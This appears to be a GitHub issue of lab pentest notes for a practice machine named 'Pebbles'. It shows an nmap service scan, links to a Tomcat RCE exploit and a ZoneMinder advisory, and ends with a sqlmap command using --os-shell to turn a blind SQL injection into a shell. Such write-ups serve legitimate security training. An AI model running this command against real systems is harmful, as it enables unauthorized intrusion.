Open WDavid404 opened 4 months ago
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 61 vsftpd 3.0.3
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Pebbles
3305/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
8080/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Tomcat
|_http-server-header: Apache/2.4.18 (Ubuntu)
8080/tcp web page --> Tomcat 9.0 --> https://github.com/PenTestical/CVE-2020-9484 (Remote Code Execution Exploit in Apache Tomcat 9.0.27)
8080/zm/ page --> ZoneMinder Console - Running - default v1.29.0 --> https://www.exploit-db.com/exploits/41239 (Zoneminder 1.29/1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery)
It works when trying an SQL injection command. Additionally, it is blind SQL injection.
It is recommended to use sqlmap....
sqlmap -u http://192.168.207.52/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" -p limit --os-shell
Key points: